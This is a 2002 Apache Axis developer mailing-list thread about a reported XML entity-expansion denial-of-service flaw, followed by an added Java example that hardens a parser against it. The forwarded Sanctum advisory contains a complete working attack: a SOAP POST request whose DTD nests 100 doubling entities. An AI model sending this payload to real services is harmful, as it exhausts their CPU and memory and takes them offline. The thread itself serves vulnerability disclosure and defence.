I wonder if it might be possible to create our own SAX InputSource that filters the incoming XML stream and throws an exception when it hits an XML construct that is considered dangerous?
ADK
--------------------------------------------
There is no magic.


Scott Nichol <snicholnews@scottnichol.com>
27/11/2002 11:13
Please respond to axis-dev

To: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
cc:
Subject: Re: Fw: Security Alert - Apache/Axis


I notice that the Axis solution is brute force: refuse to process any request with a DTD. Since Apache SOAP reads the envelope into a string before parsing it to a DOM, a similarly brute-force approach would be to refuse to process any envelope containing <!DOCTYPE. (If this were intended to be a valid part of parameter data, the < would be &lt;.)

Scott Nichol

----- Original Message -----
From: "Sanjiva Weerawarana" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Tuesday, November 26, 2002 4:46 PM
Subject: Re: Fw: Security Alert - Apache/Axis

> Note that this vulnerability exists in Apache SOAP because we use
> the DOM parser and there's no way to turn off entity expansion
> AFAIK. The only solution would be to do some Xerces specific thing
> and lose the JAXP capability .. which would suck.
>
> Sanjiva.
>
> ----- Original Message -----
> From: "Dirk-Willem van Gulik" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
> Cc: <[EMAIL PROTECTED]>
> Sent: Tuesday, November 26, 2002 4:27 PM
> Subject: Re: Fw: Security Alert - Apache/Axis
>
> > Tom/Dims,
> >
> > Could you folks verify this and report back to [EMAIL PROTECTED] that
> > each of those are 100% taken care of?
> >
> > Then security@ can report back to the various constituencies, work with
> > CERT if that is needed, etc. If you have any thoughts/statement which need
> > to be added - make sure you add that.
> >
> > Dw
> >
> > On Tue, 26 Nov 2002, Davanum Srinivas wrote:
> >
> > > I think tom fixed it
> > > (http://marc.theaimsgroup.com/?l=axis-dev&m=103773176108393&w=2)
> > >
> > > Thanks,
> > > dims
> > >
> > > --- Ted Leung <[EMAIL PROTECTED]> wrote:
> > > > This security alert came through today.
> > > >
> > > > Ted
> > > > ----- Original Message -----
> > > > From: "Ian Holsman" <[EMAIL PROTECTED]>
> > > > To: <[EMAIL PROTECTED]>
> > > > Cc: "Ory Segal" <[EMAIL PROTECTED]>
> > > > Sent: Tuesday, November 26, 2002 8:02 AM
> > > > Subject: Security Alert - Apache/Axis
> > > >
> > > > > Dear [EMAIL PROTECTED],
> > > > >
> > > > > During a recent security audit at one of our customers, Sanctum found a
> > > > > security vulnerability in your product Apache/Axis.
> > > > > The details of this vulnerability are described in the attached text file.
> > > > >
> > > > > We intend to issue a public advisory on BugTraq, SecuriTeam and other site
> > > > > forums about this vulnerability the last week of November. Please note, the
> > > > > advisory will not contain specifics that might enable someone to exploit the
> > > > > vulnerability.
> > > > >
> > > > > We would appreciate it if you could issue a patch in that timeline (i.e.
> > > > > around November 25th), so it can be linked to our advisory.
> > > > >
> > > > > Please feel free to contact me for more information/help.
> > > > >
> > > > > Thanks,
> > > > > -Amit
> > > > >
> > > > > <<XML_DTD_Axis.txt>>
> > > >
> > > > ///////////////////////////////////////////////////////////////////////
> > > > ========================>> Security Advisory <<========================
> > > > ///////////////////////////////////////////////////////////////////////
> > > >
> > > > => Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/
> > > >
> > > > => Release date: 14/Nov/2002
> > > >
> > > > => Vendor: Apache Group
> > > >
> > > > The following product was found to be vulnerable:
> > > >
> > > > - Apache Axis SOAP server (checked with Xerces-J and Tomcat)
> > > >
> > > > The versions affected are the latest ones (as of October 2002).
> > > >
> > > > => Severity: High
> > > >
> > > > => CVE candidate: Not assigned yet.
> > > >
> > > > => Summary: Using the DTD part of the XML document, it is possible to cause the
> > > > XML parser to consume 100% CPU and/or a lot of memory, therefore resulting in
> > > > a denial of service condition.
> > > >
> > > > => Description: The DTD part of the XML document enables the document to define
> > > > named entities (other than the predefined &lt;, &gt;, etc.). The entities can be
> > > > defined using other entities (recursion is prohibited in XML 1.0).
> > > > Entities are expanded when they are referenced, inside the XML document.
> > > > The attack is comprised of defining and referencing an entity which is defined
> > > > using two instances of another entity, which is (in turn) defined as two instances
> > > > of yet another entity, and so on. This definition process can be repeated as long
> > > > as "necessary" - we found that a nesting level of 100 is usually sufficient.
> > > > The 100th entity should be defined simply as a string. This has the effect of having
> > > > the first entity contain, in theory, 2^99 (two to the power of ninety nine)
> > > > concatenated values of the 100th entity.
> > > > Here's an example (the DTD is to be placed after the XML declaration, and before the
> > > > root element of the XML document):
> > > >
> > > > <!DOCTYPE root [
> > > > <!ENTITY x100 "foobar">
> > > > <!ENTITY x99 "&x100;&x100;">
> > > > <!ENTITY x98 "&x99;&x99;">
> > > > <!ENTITY x97 "&x98;&x98;">
> > > > ...
> > > > <!ENTITY x3 "&x4;&x4;">
> > > > <!ENTITY x2 "&x3;&x3;">
> > > > <!ENTITY x1 "&x2;&x2;">
> > > > ]>
> > > >
> > > > Referring to the first entity inside a document that would otherwise be accepted by
> > > > the application (using the syntax &x1;), results in a DoS condition, due to the
> > > > excessive CPU load and/or memory load required by the XML parser to expand this entity.
> > > >
> > > > => Solution: Not available yet.
> > > >
> > > > => Workaround: Not available yet.
> > > >
> > > > => Example:
> > > >
> > > > Ory Segal from Sanctum devised a SOAP request that manages to mount this attack requiring
> > > > only a path to an existing web service to be known to the attacker.
> > > >
> > > > The request is:
> > > >
> > > > POST path_to_web_service HTTP/1.0
> > > > Host: ...
> > > > Content-Type: text/xml
> > > > SOAPAction: ""
> > > > Content-Length: 3224
> > > >
> > > > <?xml version="1.0" ?>
> > > > <!DOCTYPE foobar [
> > > > <!ENTITY x0 "hello">
> > > > <!ENTITY x1 "&x0;&x0;">
> > > > <!ENTITY x2 "&x1;&x1;">
> > > > <!ENTITY x3 "&x2;&x2;">
> > > > <!ENTITY x4 "&x3;&x3;">
> > > > <!ENTITY x5 "&x4;&x4;">
> > > > <!ENTITY x6 "&x5;&x5;">
> > > > <!ENTITY x7 "&x6;&x6;">
> > > > <!ENTITY x8 "&x7;&x7;">
> > > > <!ENTITY x9 "&x8;&x8;">
> > > > <!ENTITY x10 "&x9;&x9;">
> > > > <!ENTITY x11 "&x10;&x10;">
> > > > <!ENTITY x12 "&x11;&x11;">
> > > > <!ENTITY x13 "&x12;&x12;">
> > > > <!ENTITY x14 "&x13;&x13;">
> > > > <!ENTITY x15 "&x14;&x14;">
> > > > <!ENTITY x16 "&x15;&x15;">
> > > > <!ENTITY x17 "&x16;&x16;">
> > > > <!ENTITY x18 "&x17;&x17;">
> > > > <!ENTITY x19 "&x18;&x18;">
> > > > <!ENTITY x20 "&x19;&x19;">
> > > > <!ENTITY x21 "&x20;&x20;">
> > > > <!ENTITY x22 "&x21;&x21;">
> > > > <!ENTITY x23 "&x22;&x22;">
> > > > <!ENTITY x24 "&x23;&x23;">
> > > > <!ENTITY x25 "&x24;&x24;">
> > > > <!ENTITY x26 "&x25;&x25;">
> > > > <!ENTITY x27 "&x26;&x26;">
> > > > <!ENTITY x28 "&x27;&x27;">
> > > > <!ENTITY x29 "&x28;&x28;">
> > > > <!ENTITY x30 "&x29;&x29;">
> > > > <!ENTITY x31 "&x30;&x30;">
> > > > <!ENTITY x32 "&x31;&x31;">
> > > > <!ENTITY x33 "&x32;&x32;">
> > > > <!ENTITY x34 "&x33;&x33;">
> > > > <!ENTITY x35 "&x34;&x34;">
> > > > <!ENTITY x36 "&x35;&x35;">
> > > > <!ENTITY x37 "&x36;&x36;">
> > > > <!ENTITY x38 "&x37;&x37;">
> > > > <!ENTITY x39 "&x38;&x38;">
> > > > <!ENTITY x40 "&x39;&x39;">
> > > > <!ENTITY x41 "&x40;&x40;">
> > > > <!ENTITY x42 "&x41;&x41;">
> > > > <!ENTITY x43 "&x42;&x42;">
> > > > <!ENTITY x44 "&x43;&x43;">
> > > > <!ENTITY x45 "&x44;&x44;">
> > > > <!ENTITY x46 "&x45;&x45;">
> > > > <!ENTITY x47 "&x46;&x46;">
> > > > <!ENTITY x48 "&x47;&x47;">
> > > > <!ENTITY x49 "&x48;&x48;">
> > > > <!ENTITY x50 "&x49;&x49;">
> > > > <!ENTITY x51 "&x50;&x50;">
> > > > <!ENTITY x52 "&x51;&x51;">
> > > > <!ENTITY x53 "&x52;&x52;">
> > > > <!ENTITY x54 "&x53;&x53;">
> > > > <!ENTITY x55 "&x54;&x54;">
> > > > <!ENTITY x56 "&x55;&x55;">
> > > > <!ENTITY x57 "&x56;&x56;">
> > > > <!ENTITY x58 "&x57;&x57;">
> > > > <!ENTITY x59 "&x58;&x58;">
> > > > <!ENTITY x60 "&x59;&x59;">
> > > > <!ENTITY x61 "&x60;&x60;">
> > > > <!ENTITY x62 "&x61;&x61;">
> > > > <!ENTITY x63 "&x62;&x62;">
> > > > <!ENTITY x64 "&x63;&x63;">
> > > > <!ENTITY x65 "&x64;&x64;">
> > > > <!ENTITY x66 "&x65;&x65;">
> > > > <!ENTITY x67 "&x66;&x66;">
> > > > <!ENTITY x68 "&x67;&x67;">
> > > > <!ENTITY x69 "&x68;&x68;">
> > > > <!ENTITY x70 "&x69;&x69;">
> > > > <!ENTITY x71 "&x70;&x70;">
> > > > <!ENTITY x72 "&x71;&x71;">
> > > > <!ENTITY x73 "&x72;&x72;">
> > > > <!ENTITY x74 "&x73;&x73;">
> > > > <!ENTITY x75 "&x74;&x74;">
> > > > <!ENTITY x76 "&x75;&x75;">
> > > > <!ENTITY x77 "&x76;&x76;">
> > > > <!ENTITY x78 "&x77;&x77;">
> > > > <!ENTITY x79 "&x78;&x78;">
> > > > <!ENTITY x80 "&x79;&x79;">
> > > > <!ENTITY x81 "&x80;&x80;">
> > > > <!ENTITY x82 "&x81;&x81;">
> > > > <!ENTITY x83 "&x82;&x82;">
> > > > <!ENTITY x84 "&x83;&x83;">
> > > > <!ENTITY x85 "&x84;&x84;">
> > > > <!ENTITY x86 "&x85;&x85;">
> > > > <!ENTITY x87 "&x86;&x86;">
> > > > <!ENTITY x88 "&x87;&x87;">
> > > > <!ENTITY x89 "&x88;&x88;">
> > > > <!ENTITY x90 "&x89;&x89;">
> > > > <!ENTITY x91 "&x90;&x90;">
> > > > <!ENTITY x92 "&x91;&x91;">
> > > > <!ENTITY x93 "&x92;&x92;">
> > > > <!ENTITY x94 "&x93;&x93;">
> > > > <!ENTITY x95 "&x94;&x94;">
> > > > <!ENTITY x96 "&x95;&x95;">
> > > > <!ENTITY x97 "&x96;&x96;">
> > > > <!ENTITY x98 "&x97;&x97;">
> > > > <!ENTITY x99 "&x98;&x98;">
> > > > <!ENTITY x100 "&x99;&x99;">
> > > > ]>
> > > > <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
> > > > xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"
> > > > xmlns:xsd="http://www.w3.org/1999/XMLSchema">
> > > > <SOAP-ENV:Body>
> > > > <ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
> > > > <foobar xsi:type="xsd:string">&x100;</foobar>
> > > > </ns1:aaa>
> > > > </SOAP-ENV:Body>
> > > > </SOAP-ENV:Envelope>
> > >
> > > =====
> > > Davanum Srinivas - http://xml.apache.org/~dims/
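The two mitigations discussed in this thread, a raw-string check for <!DOCTYPE on the envelope before parsing and a parser that refuses any DOCTYPE so the entity chain is never expanded, written out as an added example; this is not code from Apache SOAP, Axis or anyone on the thread. It assumes the JDK's built-in Xerces-based JAXP parser, which honours the Xerces disallow-doctype-decl feature; the class name and the two envelope strings are constructed for the example.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class HardenedEnvelopeParser {

    // Parser that fails fast on any DOCTYPE, so no entity is ever declared or expanded.
    static DocumentBuilder newBuilder() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Xerces feature: a <!DOCTYPE ...> makes the parse throw before the DTD is read.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth: secure processing limits and no external entity resolution.
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // String-level pre-check on the raw envelope, as suggested in the thread.
    // Legitimate parameter data would carry "&lt;!DOCTYPE", which does not match.
    static boolean containsDoctype(String envelope) {
        return envelope.contains("<!DOCTYPE");
    }

    // Returns the parsed document, or null when the envelope was refused.
    static Document parseOrRefuse(DocumentBuilder b, String envelope) throws Exception {
        if (containsDoctype(envelope)) return null;
        try {
            return b.parse(new InputSource(new StringReader(envelope)));
        } catch (SAXParseException e) {   // the parser refuses a DOCTYPE as well
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        DocumentBuilder b = newBuilder();
        // Constructed inputs: a short three-level entity chain, and a benign envelope
        // whose string parameter merely mentions a DOCTYPE in escaped form.
        String hostile = "<?xml version=\"1.0\"?><!DOCTYPE e [<!ENTITY a \"hi\">"
                + "<!ENTITY b \"&a;&a;\"><!ENTITY c \"&b;&b;\">]><Envelope><Body>&c;</Body></Envelope>";
        String benign = "<?xml version=\"1.0\"?><Envelope><Body>"
                + "<p>&lt;!DOCTYPE&gt; is not allowed here</p></Body></Envelope>";
        System.out.println("hostile refused: " + (parseOrRefuse(b, hostile) == null));
        System.out.println("benign accepted: " + (parseOrRefuse(b, benign) != null));
    }
}
```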